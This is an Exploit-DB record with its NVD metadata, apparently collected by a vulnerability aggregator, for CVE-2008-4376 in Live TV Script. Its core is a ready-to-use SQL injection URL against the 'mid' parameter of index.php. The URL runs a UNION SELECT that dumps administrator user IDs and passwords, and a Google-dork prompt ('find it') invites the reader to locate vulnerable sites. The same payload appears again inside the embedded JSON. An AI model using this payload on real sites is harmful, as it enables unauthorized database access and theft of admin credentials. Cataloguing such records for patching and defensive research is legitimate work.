ID EDB-ID:6404
Type exploitdb
Reporter InjEctOr5
Modified 2008-09-09T00:00:00
Description
Live TV Script (index.php mid) SQL Injection Vulnerability. CVE-2008-4376. Webapps exploit for php platform
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
++++++++++++++++++++ Script information++++++++++++++++++++++
=======================================================
<<->> script : live-tv-script
<<->> script site : www.livetvscript.com
=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
=======================================================
<<->> D0rk : find it
<<->> Exploit :>>>
>>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker
anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x
<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
<<->> All muslims
# milw0rm.com [2008-09-09]
{"id": "EDB-ID:6404", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Live TV Script index.php mid SQL Injection Vulnerability", "description": "Live TV Script (index.php mid) SQL Injection Vulnerability. CVE-2008-4376. Webapps exploit for php platform", "published": "2008-09-09T00:00:00", "modified": "2008-09-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6404/", "reporter": "InjEctOr5", "references": [], "cvelist": ["CVE-2008-4376"], "lastseen": "2016-01-31T23:48:23", "viewCount": 9, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-01-31T23:48:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4376"]}], "modified": "2016-01-31T23:48:23", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/6404/", "sourceData": "\n || || | || \n o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, \n ( : / (_) / ( . \n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\n\n<<!>> Found by : Cyb3r-1sT\n\n<<!>> C0ntact : cyb3r-1st [at] hotmail.com \n \n<<!>> Groups : InjEctOr5 T3am \n\n\n=======================================================\n++++++++++++++++++++ Script information++++++++++++++++++++++\n=======================================================\n\n\n<<->> script : live-tv-script\n\n<<->> script site : www.livetvscript.com \n\n\n\n=======================================================\n++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++\n=======================================================\n\n\n<<->> D0rk : find it\n\n<<->> Exploit :>>>\n\n >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*\n\n\n=======================================================\n+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++\n=======================================================\n\n\n<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker \n anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x \n \n\n<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal\n\n\n\n<<->> All muslims\n\n# milw0rm.com [2008-09-09]\n", "osvdbidlist": ["47981"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:17", "description": "SQL injection vulnerability in index.php in Live TV Script allows remote attackers to execute arbitrary SQL commands via the mid parameter.", "edition": 4, "cvss3": {}, "published": "2008-10-01T15:38:00", "title": "CVE-2008-4376", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4376"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:livetvscript:live_tv_script:*"], "id": "CVE-2008-4376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4376", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:livetvscript:live_tv_script:*:*:*:*:*:*:*:*"]}]}
